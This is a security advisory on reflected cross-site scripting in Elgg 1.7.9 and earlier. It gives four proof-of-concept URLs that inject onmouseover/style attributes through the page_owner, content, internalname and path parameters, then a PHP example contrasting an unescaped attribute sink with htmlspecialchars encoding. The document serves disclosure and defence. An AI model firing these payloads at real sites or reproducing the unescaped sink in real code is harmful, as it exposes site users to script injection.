Cross Site Scripting Vulnerabilities in Elgg <= 1.7.9

A new vulnerability has been discovered in Elgg, an open-source social networking engine that delivers the building blocks enabling businesses, schools, universities and associations to create their own fully-featured social networks and applications.

Well-known organizations with networks powered by Elgg include: Australian Government, British Government, Federal Canadian Government, MITRE, The World Bank, UNESCO, NASA, Stanford University, Johns Hopkins University and more (http://elgg.org/powering.php).

The vulnerability exists in several application parameters (page_owner, content, internalname, QUERY_STRING) that are not properly sanitized before being reflected into the page, which allows an attacker to conduct Cross Site Scripting attacks.

http://localhost/elgg/mod/file/search.php?subtype=file&page_owner=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f

http://localhost/elgg/mod/riverdashboard/?content=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f&callback=true

http://localhost/elgg/pg/embed/upload?internalname=%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22

http://localhost/elgg/pg/pages/edit/%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22

To fix this vulnerability you need to upgrade Elgg to 1.7.10 or higher.
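All four proof-of-concept URLs follow the same pattern: a double quote closes an attribute the parameter is reflected into, and new attributes (style, onmouseover) are appended. The example below is an added illustration, not Elgg's own code and not the actual patch shipped in 1.7.10; the hidden-input sink and the render_* function names are assumptions chosen to show the vulnerable pattern next to the hardened one (attribute-context encoding with htmlspecialchars and ENT_QUOTES).

```php
<?php
// Added illustration, not Elgg code: the same attribute sink rendered two ways.
// Elgg <= 1.7.9 reflected parameters such as page_owner into markup without
// encoding; the hardened version encodes for the HTML attribute context.

// Constructed input, modelled on the page's PoC for page_owner: a double quote
// closes the attribute, then style and onmouseover attributes are injected.
$page_owner = '" style="position:fixed;width:1000px;height:1000px" onmouseover="alert(/XSS/)" x="f';

// Vulnerable pattern (assumed sink): raw request data concatenated into a
// quoted HTML attribute. The quote in the input terminates the attribute.
function render_vulnerable(string $value): string {
    return '<input type="hidden" name="page_owner" value="' . $value . '" />';
}

// Hardened pattern: encode for the attribute context. ENT_QUOTES turns both
// " and ' into entities, so the value can no longer close the quoted
// attribute, and the attribute itself is always written with quotes.
function render_safe(string $value): string {
    $encoded = htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="page_owner" value="' . $encoded . '" />';
}

// Review-time check: for this template the only double quotes in the output
// should be the six that delimit type, name and value. Any extra quote means
// the input broke out of its attribute.
function attribute_is_intact(string $html): bool {
    return substr_count($html, '"') === 6;
}

echo render_vulnerable($page_owner), PHP_EOL;
echo render_safe($page_owner), PHP_EOL;
var_dump(attribute_is_intact(render_vulnerable($page_owner)));
var_dump(attribute_is_intact(render_safe($page_owner)));
```

The encoded form keeps the injected text inside the value attribute as inert characters, which is the property a reviewer should verify for every reflected parameter. Encoding is only sufficient when the attribute is quoted; an unquoted attribute can still be terminated by a space, so both halves of the fix (quoting and ENT_QUOTES encoding) are needed.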
